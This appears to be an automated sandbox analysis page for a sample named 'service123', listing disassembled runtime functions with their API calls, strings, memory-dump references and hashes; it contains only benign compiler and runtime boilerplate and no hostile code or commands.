Function 6C950310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA1370F), ref: 6C95034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA1370F), ref: 6C950352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA1370F), ref: 6C950360

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: bee335ca379ad27108dce561ab20227ddb34fbdaad68db915181fb9ebf920add
Instruction ID: c90d39c218cfe6a18b3cacb73bd6f54f2277837064498ffe9398956b208bc5f2
Opcode Fuzzy Hash: bee335ca379ad27108dce561ab20227ddb34fbdaad68db915181fb9ebf920add
Instruction Fuzzy Hash: 88516C747093428FCB04DF3AC58465A77F5FB86308F95952CD88987B10E730E856CB92

Function 6C94A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C94A6BF
vfprintf.MSVCRT ref: 6C94A6DF
abort.MSVCRT ref: 6C94A6E4
VirtualQuery.KERNEL32 ref: 6C94A77B

Strings

VirtualProtect failed with code 0x%x, xrefs: 6C94A7F6
Mingw-w64 runtime failure:, xrefs: 6C94A6B8
Address %p has no image-section, xrefs: 6C94A83B
VirtualQuery failed for %d bytes at address %p, xrefs: 6C94A827

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 592e9c53f3662a4f6695e91b6fc5b83418fad0875be2c932c2fe7057a5bbe12d
Instruction ID: 442273db0b6336cc24303692ac5abb1fb68270bcc5d2bf4b22ac24847d39a46f
Opcode Fuzzy Hash: 592e9c53f3662a4f6695e91b6fc5b83418fad0875be2c932c2fe7057a5bbe12d
Instruction Fuzzy Hash: 8B517CB19053019FE704DF29C58065ABBF4FF95318F55C92CE9888B750E734E84ACBA2

Function 00661940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0066196F
vfprintf.MSVCRT ref: 0066198F
abort.MSVCRT ref: 00661994
VirtualQuery.KERNEL32 ref: 00661A2B

Strings

VirtualProtect failed with code 0x%x, xrefs: 00661AA6
Mingw-w64 runtime failure:, xrefs: 00661968
VirtualQuery failed for %d bytes at address %p, xrefs: 00661AD7
Address %p has no image-section, xrefs: 00661AEB

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: b435e331c75209825e00bf806591c399fa8514a6a6ed13f91d597b9272fa022a
Instruction ID: 3ed34bd5ca5123a6da8a0c94f5d7cad3c2de482bae5a7a89592f8549aab1e3d7
Opcode Fuzzy Hash: b435e331c75209825e00bf806591c399fa8514a6a6ed13f91d597b9272fa022a
Instruction Fuzzy Hash: 3E51A9B1908300DFC700EF68D88565AFBE2FF85354F088A2CE8889B311E774E845CB96

Function 6C94E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: cd5839d951ebc7b0f7ede901ae436b82e07004bab35dd60c3ccf92b8a203fb03
Instruction ID: 98e794f09d433370e178e26120d76701703bf2a98b478f4bbb3d55583647c050
Opcode Fuzzy Hash: cd5839d951ebc7b0f7ede901ae436b82e07004bab35dd60c3ccf92b8a203fb03
Instruction Fuzzy Hash: 84210532749219CBC704CF58D881A96B3A6EBC632C72CC1BEE5588BB55D637E817C790

Function 6C94E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: e0adeab6767ec8d5535a48d2ddf31770e9aa9d976dcb5a1d47acf7a55c6108b9
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 8641D4706087168BD710DF29C08076AF7E9AF92318F54CE1AE4A487E95E334D94ECBD2

Function 6C94E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 33057c19be49be52b055ebcba10d26f53858a8f8e3177376e7a1956373beb45f
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 9721B6705057168BDB10DF28C09066AF7E9AF91718F64CE19E4B487E85E334D94ACBD2

Function 6C94E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 78443324e8378de4b09f7978708ece35bb84bb53857b2cd25ed8a2df07707471
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 29E0867048C6198BCB10CF28C061595F7D9DF66348F40C906D4D5C7E14D330D94BCAC6

Function 6C959249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C959260
GetProcAddress.KERNEL32 ref: 6C95927A
LoadLibraryW.KERNEL32 ref: 6C95929F
GetProcAddress.KERNEL32 ref: 6C9592B3

Strings

rand_s, xrefs: 6C95926F
msvcrt.dll, xrefs: 6C959255
advapi32.dll, xrefs: 6C959298
SystemFunction036, xrefs: 6C9592A8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 065d3ad9fa5f50fb27e3fcecdb3dd3bb2d1a0e4af773582d7a0095dc778a11d7
Instruction ID: ee4e5149c866b24ab55b4eceb9930552630b7f8e6ebb01681b0c47c301e62081
Opcode Fuzzy Hash: 065d3ad9fa5f50fb27e3fcecdb3dd3bb2d1a0e4af773582d7a0095dc778a11d7
Instruction Fuzzy Hash: EDF049F29543518BDB00FFBD864A21ABBB4BB06320F46492CD4C997600E338D465DBA7

Function 6C9DF670 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF70D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF738
memmove.MSVCRT ref: 6C9DF787
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF7BD
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF808

Strings

basic_string::_M_replace, xrefs: 6C9DF966

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: be03205762a9adcf258b0195076b2ddaf16d1932b754df49f9cbd2149a6bfbb7
Instruction ID: 73d6077b0ea85cb65c86ed0744b92b8aa1c4076bff351ef67612e67f7889b323
Opcode Fuzzy Hash: be03205762a9adcf258b0195076b2ddaf16d1932b754df49f9cbd2149a6bfbb7
Instruction Fuzzy Hash: 948159B4A097429FC301CF68C08146EBBE5AFD6648F16885EE4E5A7715D332E889CB53

Function 6C94FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9500D2
WaitForSingleObject.KERNEL32 ref: 6C950117

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: c1c21fce1fa68e54f6aceaabcba192be4deb8ceddc62ad1a9d01003d6d7b164c
Instruction ID: 4b4f7d67e589e67184aeb3b705aef055c7505997370759f46987458ee534e645
Opcode Fuzzy Hash: c1c21fce1fa68e54f6aceaabcba192be4deb8ceddc62ad1a9d01003d6d7b164c
Instruction Fuzzy Hash: C6616870709346CFDB14DF7AC54436AB7F8AB4630CF51C629E89987A40D770D86ACBA2

Function 6C94E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: e23d810419b93f5b464de2f8fa51ced729edf03497cda6dcbdc3d9dd34e985f6
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: E701C475A59219CFC700CB1CC480A9BF7E9ABA5724F059D29F88587B14E234ECCAC7C2

Function 6C9532C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C953391

Strings

0, xrefs: 6C95380E
o, xrefs: 6C953778

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: c79c4516ba82d0a1db1dc3bf2c10e4145d2c0fb6c9d0dc78d8b149b96e6f6190
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 61F1A071A052098FCB01CF78C48079DBBF6BF89364F998229D858ABB85D734E955CB90

Function 00662BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00662CC1

Strings

0, xrefs: 0066313E
o, xrefs: 006630A8

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 38dc33a2a6e8dcbe771d1d062fb1ddca804c3c2b325b1ab638d5fe29fdfef555
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: D4F17C71A0461A8FCB15CF68C4906DDBBF2BF89360F198229E895AB391D734E945CB90

Function 6C9413E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C9413F0
LoadLibraryA.KERNEL32 ref: 6C941406
GetProcAddress.KERNEL32 ref: 6C941425
GetProcAddress.KERNEL32 ref: 6C941437

Strings

libgcc_s_dw2-1.dll, xrefs: 6C9413E9, 6C9413FF
__register_frame_info, xrefs: 6C94141A
__deregister_frame_info, xrefs: 6C94142C

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: afa95ba8db304b620bbbe509089f24ba98785b6209dc154957d4d21ff3f728ab
Instruction ID: 8c2a513b7b46a24a6ba90e3fd515ea514f1d956ad2e5d216650e3e7367dedee9
Opcode Fuzzy Hash: afa95ba8db304b620bbbe509089f24ba98785b6209dc154957d4d21ff3f728ab
Instruction Fuzzy Hash: DE0121B69193559FCB00BFBD9A0721E7FB4AA42295F02852DD59987A10E730C464CBA3

Function 006614E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006614F0
LoadLibraryA.KERNEL32 ref: 00661506
GetProcAddress.KERNEL32 ref: 00661525
GetProcAddress.KERNEL32 ref: 00661537

Strings

__register_frame_info, xrefs: 0066151A
__deregister_frame_info, xrefs: 0066152C
libgcc_s_dw2-1.dll, xrefs: 006614E9, 006614FF

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: d395db92f0df87ef22c75b857fec07d77531f7c34e7f4a3cfefa9d6d9fc5f694
Instruction ID: ef589ec29068ea598157bac3efd18a262366849e3e0a72bbd6eaa7119eb67b9e
